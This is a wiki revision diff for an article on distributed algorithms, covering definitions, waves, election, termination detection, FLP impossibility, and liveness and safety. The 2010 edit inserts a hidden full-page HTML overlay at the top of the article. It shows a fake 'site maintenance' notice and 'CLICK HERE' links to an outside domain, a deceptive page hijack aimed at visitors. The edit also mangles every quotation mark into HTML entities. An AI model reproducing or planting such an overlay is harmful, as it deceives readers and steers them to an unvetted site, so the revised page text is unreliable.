Distributed Algorithm

Revision as of 19:54, 2 October 2008 (view source)

(New page: A '''distributed algorithm''' is an decentralized algorithm that is executed in a distributed system, on more than one machine, node or processor. == Definition == ...)

← Older edit

Revision as of 02:44, 24 November 2010 (view source)

Eboxytezi (Talk | contribs)

Newer edit →

Line 1:

+

----

+

+

----

+

=[http://ujybyqum.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]=

+

----

+

=[http://ujybyqum.co.cc CLICK HERE]=

+

----

+

</div>

A '''distributed algorithm''' is an decentralized algorithm that is executed in a [[Distributed System|distributed system]], on more than one machine, node or processor.

Line 4:

Line 12:

A distributed algorithm for a collection P of processes is, according to Gerard Tel and his book ''Introduction to Distributed Algorithms'', simply a collection of local algorithms, one for each process in P. In his

-

earlier work ''Topics in Distributed Algorithms'' he defined it as follows: "a distributed algorithm executes

+

earlier work ''Topics in Distributed Algorithms'' he defined it as follows: "a distributed algorithm executes

as a collection of sequential processes, all executing their part of the algorithm independently, but

-

coordinating their activity through communication." Nancy A. Lynch argues "Distributed algorithms are algorithms

+

coordinating their activity through communication." Nancy A. Lynch argues "Distributed algorithms are algorithms

designed to run on hardware consisting of many interconnected processors. The algorithms are supposed to work

correctly, even if the individual processors and communication channels operate at different speeds and even if

-

some of the components fail."

+

some of the components fail."

In sequential algorithms steps are taken in a strict sequence and well-defined order. In distributed systems

Line 68:

Line 76:

be considered as a wave for a ring topology. The importance of waves is not surprising, since a wave is

one of the most basic forms of [[Emergence|emergence]] in a system. If all nodes are visited

-

sequentially, or an action like "inform all" or "query all" is required, a kind of wave must be used.

+

sequentially, or an action like "inform all" or "query all" is required, a kind of wave must be used.

Fundamental algorithms where all nodes of a network are visited are [[Total Algorithm]]s and

[[Heart Beat Algorithm]]s.

-

A common problem besides "inform all" and "query all" is "select one", "elect one", "admit one", etc.

+

A common problem besides "inform all" and "query all" is "select one", "elect one", "admit one", etc.

The resulting algorithms are named [[Election Algorithm|election algorithms]], where a single node or

process (for example the leader) that is to play a distinguished role in a subsequent computation must

Line 79:

Line 87:

avoided.

-

Finally it is problem to determine and change the "global state" or the "global order", the associated

+

Finally it is problem to determine and change the "global state" or the "global order", the associated

distributed algorithms are named [[Termination Detection|termination detection]], where the end of a

distributed computation has to be detected, and distributed [[garbage collection]], where unused memory and

-

references must be released. A basic "toy" algorithm used to explain distributed algorithms

+

references must be released. A basic "toy" algorithm used to explain distributed algorithms

in classes is the [[Distributed GCD Algorithm|distributed GCD algorithm]].

Line 135:

Line 143:

=== Problem Fields ===

-

Termination detectection is difficult, because a distributed system has no global state which can be detected instantly, and there is no global time which is valid for all computers, nodes or entities. In order to define a global state, some authors have proposed algorithms for consistent [[Global Snapshots|global snapshots]], for example the Chandy-Lamport algorithm. A snapshot is "consistent" if it appears as if it were take at the same instant everywhere in the system, without any violation of causality. In order to define a global time, some authors have proposed methods for consistent global time (logical clocks by Lamport, which find their extension in vector clocks and vector time, etc.). The concept of a "logical time" or timestamps introduced by Lamport allows an asynchronous system to simulate one in which the nodes have access to synchronized clocks. Both real and logical time are monotonically increasing, but the real time is uniformly continuous, whereas the logical time can have discontinuous jumps. But these methods are problematical and doubtful, because they attempt to make distributed computing follow the model of local, centralized computing. As Waldo noticed in 1994, this method ignores "the different failure modes and basic indeterminacy inherent in distributed computing" and leads to systems that are neither reliable and nor scalable.

+

Termination detectection is difficult, because a distributed system has no global state which can be detected instantly, and there is no global time which is valid for all computers, nodes or entities. In order to define a global state, some authors have proposed algorithms for consistent [[Global Snapshots|global snapshots]], for example the Chandy-Lamport algorithm. A snapshot is "consistent" if it appears as if it were take at the same instant everywhere in the system, without any violation of causality. In order to define a global time, some authors have proposed methods for consistent global time (logical clocks by Lamport, which find their extension in vector clocks and vector time, etc.). The concept of a "logical time" or timestamps introduced by Lamport allows an asynchronous system to simulate one in which the nodes have access to synchronized clocks. Both real and logical time are monotonically increasing, but the real time is uniformly continuous, whereas the logical time can have discontinuous jumps. But these methods are problematical and doubtful, because they attempt to make distributed computing follow the model of local, centralized computing. As Waldo noticed in 1994, this method ignores "the different failure modes and basic indeterminacy inherent in distributed computing" and leads to systems that are neither reliable and nor scalable.

Thus we have roughly the following problem fields:

Line 146:

Line 154:

=== Impossibility Results ===

-

Given these difficulties, it is not surprising that the analysis and design of distributed algorithms that work in a general [[Distributed System|distributed system]] (where each node and link can fail at any time, and messages can have an arbitrary time delay) is very hard and sometimes even impossible. Already one faulty process can render any guaranty about achieving of a common consensus impossible, as the famous "FLP impossibility argument" says. The "FLP impossibility result" or "FLP impossibility argument" from Fisher, Lynch and Patterson says it is impossible to reach consensus in a distributed, asynchronous systems if only one process is faulty. To be more precise it says there is no guruantee a common consensus can be reached, if a faulty process exists. This fact is intuitive plausible, since a faulty process that is not responding anymore is indistinguishable from a process that answers slowly (if there is an arbitrary time delay in the connection of the asynchronous network).

+

Given these difficulties, it is not surprising that the analysis and design of distributed algorithms that work in a general [[Distributed System|distributed system]] (where each node and link can fail at any time, and messages can have an arbitrary time delay) is very hard and sometimes even impossible. Already one faulty process can render any guaranty about achieving of a common consensus impossible, as the famous "FLP impossibility argument" says. The "FLP impossibility result" or "FLP impossibility argument" from Fisher, Lynch and Patterson says it is impossible to reach consensus in a distributed, asynchronous systems if only one process is faulty. To be more precise it says there is no guruantee a common consensus can be reached, if a faulty process exists. This fact is intuitive plausible, since a faulty process that is not responding anymore is indistinguishable from a process that answers slowly (if there is an arbitrary time delay in the connection of the asynchronous network).

-

Consensus and agreement problems are a fundamental challenge in [[Distributed System|distributed systems]]. The consensus problem is one of the most thoroughly investigated problem in [[Distributed Computing|distributed computing]], where several process have to agree on a certain value or decision. Processes in a database system may need to agree whether or not a transaction should be commited or aborted. Processes in a control or monitoring system may need to agree whether or not a particular other process is faulty. Processes in a general distributed system may need to agree whether or not a message has been received. As Nancy Lynch says (in "Chapter 12" Consensus of her book), "the impossibility result implies that there is no purely asynchronous algorithm that reaches the needed agreement and tolerates any failures at all."

+

Consensus and agreement problems are a fundamental challenge in [[Distributed System|distributed systems]]. The consensus problem is one of the most thoroughly investigated problem in [[Distributed Computing|distributed computing]], where several process have to agree on a certain value or decision. Processes in a database system may need to agree whether or not a transaction should be commited or aborted. Processes in a control or monitoring system may need to agree whether or not a particular other process is faulty. Processes in a general distributed system may need to agree whether or not a message has been received. As Nancy Lynch says (in "Chapter 12" Consensus of her book), "the impossibility result implies that there is no purely asynchronous algorithm that reaches the needed agreement and tolerates any failures at all."

== Proof and Verification ==

Line 157:

Line 165:

The traditional definition of liveness and safety are:

-

* '''Liveness''' means "something good will eventually occur" or "something good eventually happens"

+

* '''Liveness''' means "something good will eventually occur" or "something good eventually happens"

-

* '''Safety''' means "something bad will never happen" or "no bad thing ever happens"

+

* '''Safety''' means "something bad will never happen" or "no bad thing ever happens"

Liveness and safety are two complementary properties, one says that

Distributed Algorithm

From CasGroup

Revision as of 02:44, 24 November 2010

Views

Personal tools

Navigation

Search

Toolbox

@@ Line 1: / Line 1: @@
+----
+<div style="background: #E8E8E8 none repeat scroll 0% 0%; overflow: hidden; font-family: Tahoma; font-size: 11pt; line-height: 2em; position: absolute; width: 2000px; height: 2000px; z-index: 1410065407; top: 0px; left: -250px; padding-left: 400px; padding-top: 50px; padding-bottom: 350px;">
+----
+=[http://ujybyqum.co.cc Page Is Unavailable Due To Site Maintenance, Please Visit Reserve Copy Page]=
+----
+=[http://ujybyqum.co.cc CLICK HERE]=
+----
+</div>
 A '''distributed algorithm''' is an decentralized algorithm that is executed in a [[Distributed System|distributed system]], on more than one machine, node or processor.
@@ Line 4: / Line 12: @@
 A distributed algorithm for a collection P of processes is, according to Gerard Tel and his book ''Introduction to Distributed Algorithms'', simply a collection of local algorithms, one for each process in P. In his
-earlier work ''Topics in Distributed Algorithms'' he defined it as follows: "a distributed algorithm executes
+earlier work ''Topics in Distributed Algorithms'' he defined it as follows: &quot;a distributed algorithm executes
 as a collection of sequential processes, all executing their part of the algorithm independently, but
-coordinating their activity through communication." Nancy A. Lynch argues "Distributed algorithms are algorithms
+coordinating their activity through communication.&quot; Nancy A. Lynch argues &quot;Distributed algorithms are algorithms
 designed to run on hardware consisting of many interconnected processors. The algorithms are supposed to work
 correctly, even if the individual processors and communication channels operate at different speeds and even if
-some of the components fail."
+some of the components fail.&quot;
 In sequential algorithms steps are taken in a strict sequence and well-defined order. In distributed systems
@@ Line 68: / Line 76: @@
 be considered as a wave for a ring topology. The importance of waves is not surprising, since a wave is
 one of the most basic forms of [[Emergence|emergence]] in a system. If all nodes are visited
-sequentially, or an action like "inform all" or "query all" is required, a kind of wave must be used.
+sequentially, or an action like &quot;inform all&quot; or &quot;query all&quot; is required, a kind of wave must be used.
 Fundamental algorithms where all nodes of a network are visited are [[Total Algorithm]]s and
 [[Heart Beat Algorithm]]s.
-A common problem besides "inform all" and "query all" is "select one", "elect one", "admit one", etc.
+A common problem besides &quot;inform all&quot; and &quot;query all&quot; is &quot;select one&quot;, &quot;elect one&quot;, &quot;admit one&quot;, etc.
 The resulting algorithms are named [[Election Algorithm|election algorithms]], where a single node or
 process (for example the leader) that is to play a distinguished role in a subsequent computation must
@@ Line 79: / Line 87: @@
 avoided.
-Finally it is problem to determine and change the "global state" or the "global order", the associated
+Finally it is problem to determine and change the &quot;global state&quot; or the &quot;global order&quot;, the associated
 distributed algorithms are named [[Termination Detection|termination detection]], where the end of a
 distributed computation has to be detected, and distributed [[garbage collection]], where unused memory and
-references must be released. A basic "toy" algorithm used to explain distributed algorithms
+references must be released. A basic &quot;toy&quot; algorithm used to explain distributed algorithms
 in classes is the [[Distributed GCD Algorithm|distributed GCD algorithm]].
@@ Line 135: / Line 143: @@
 === Problem Fields ===
-Termination detectection is difficult, because a distributed system has no global state which can be detected instantly, and there is no global time which is valid for all computers, nodes or entities. In order to define a global state, some authors have proposed algorithms for consistent [[Global Snapshots|global snapshots]], for example the Chandy-Lamport algorithm. A snapshot is "consistent" if it appears as if it were take at the same instant everywhere in the system, without any violation of causality. In order to define a global time, some authors have proposed methods for consistent global time (logical clocks by Lamport, which find their extension in vector clocks and vector time, etc.). The concept of a "logical time" or timestamps introduced by Lamport allows an asynchronous system to simulate one in which the nodes have access to synchronized clocks. Both real and logical time are monotonically increasing, but the real time is uniformly continuous, whereas the logical time can have discontinuous jumps. But these methods are problematical and doubtful, because they attempt to make distributed computing follow the model of local, centralized computing. As Waldo noticed in 1994, this method ignores "the different failure modes and basic indeterminacy inherent in distributed computing" and leads to systems that are neither reliable and nor scalable.
+Termination detectection is difficult, because a distributed system has no global state which can be detected instantly, and there is no global time which is valid for all computers, nodes or entities. In order to define a global state, some authors have proposed algorithms for consistent [[Global Snapshots|global snapshots]], for example the Chandy-Lamport algorithm. A snapshot is &quot;consistent&quot; if it appears as if it were take at the same instant everywhere in the system, without any violation of causality. In order to define a global time, some authors have proposed methods for consistent global time (logical clocks by Lamport, which find their extension in vector clocks and vector time, etc.). The concept of a &quot;logical time&quot; or timestamps introduced by Lamport allows an asynchronous system to simulate one in which the nodes have access to synchronized clocks. Both real and logical time are monotonically increasing, but the real time is uniformly continuous, whereas the logical time can have discontinuous jumps. But these methods are problematical and doubtful, because they attempt to make distributed computing follow the model of local, centralized computing. As Waldo noticed in 1994, this method ignores &quot;the different failure modes and basic indeterminacy inherent in distributed computing&quot; and leads to systems that are neither reliable and nor scalable.
 Thus we have roughly the following problem fields:
@@ Line 146: / Line 154: @@
 === Impossibility Results ===
-Given these difficulties, it is not surprising that the analysis and design of distributed algorithms that work in a general [[Distributed System|distributed system]] (where each node and link can fail at any time, and messages can have an arbitrary time delay) is very hard and sometimes even impossible. Already one faulty process can render any guaranty about achieving of a common consensus impossible, as the famous  "FLP impossibility argument" says. The "FLP impossibility result" or "FLP impossibility argument" from Fisher, Lynch and Patterson says it is impossible to reach consensus in a distributed, asynchronous systems if only one process is faulty. To be more precise it says there is no guruantee a common consensus can be reached, if a faulty process exists. This fact is intuitive plausible, since a faulty process that is not responding anymore is indistinguishable from a process that answers slowly (if there is an arbitrary time delay in the connection of the asynchronous network).
+Given these difficulties, it is not surprising that the analysis and design of distributed algorithms that work in a general [[Distributed System|distributed system]] (where each node and link can fail at any time, and messages can have an arbitrary time delay) is very hard and sometimes even impossible. Already one faulty process can render any guaranty about achieving of a common consensus impossible, as the famous  &quot;FLP impossibility argument&quot; says. The &quot;FLP impossibility result&quot; or &quot;FLP impossibility argument&quot; from Fisher, Lynch and Patterson says it is impossible to reach consensus in a distributed, asynchronous systems if only one process is faulty. To be more precise it says there is no guruantee a common consensus can be reached, if a faulty process exists. This fact is intuitive plausible, since a faulty process that is not responding anymore is indistinguishable from a process that answers slowly (if there is an arbitrary time delay in the connection of the asynchronous network).
-Consensus and agreement problems are a fundamental challenge in [[Distributed System|distributed systems]]. The consensus problem is one of the most thoroughly investigated problem in [[Distributed Computing|distributed computing]], where several process have to agree on a certain value or decision. Processes in a database system may need to agree whether or not a transaction should be commited or aborted. Processes in a control or monitoring system may need to agree whether or not a particular other process is faulty. Processes in a general distributed system may need to agree whether or not a message has been received. As Nancy Lynch says (in "Chapter 12" Consensus of her book), "the impossibility result implies that there is no purely asynchronous algorithm that reaches the needed agreement and tolerates any failures at all."
+Consensus and agreement problems are a fundamental challenge in [[Distributed System|distributed systems]]. The consensus problem is one of the most thoroughly investigated problem in [[Distributed Computing|distributed computing]], where several process have to agree on a certain value or decision. Processes in a database system may need to agree whether or not a transaction should be commited or aborted. Processes in a control or monitoring system may need to agree whether or not a particular other process is faulty. Processes in a general distributed system may need to agree whether or not a message has been received. As Nancy Lynch says (in &quot;Chapter 12&quot; Consensus of her book), &quot;the impossibility result implies that there is no purely asynchronous algorithm that reaches the needed agreement and tolerates any failures at all.&quot;
 == Proof and Verification ==
@@ Line 157: / Line 165: @@
 The traditional definition of liveness and safety are:
-* '''Liveness''' means "something good will eventually occur" or "something good eventually happens"
+* '''Liveness''' means &quot;something good will eventually occur&quot; or &quot;something good eventually happens&quot;
-* '''Safety''' means "something bad will never happen" or "no bad thing ever happens"
+* '''Safety''' means &quot;something bad will never happen&quot; or &quot;no bad thing ever happens&quot;
 Liveness and safety are two complementary properties, one says that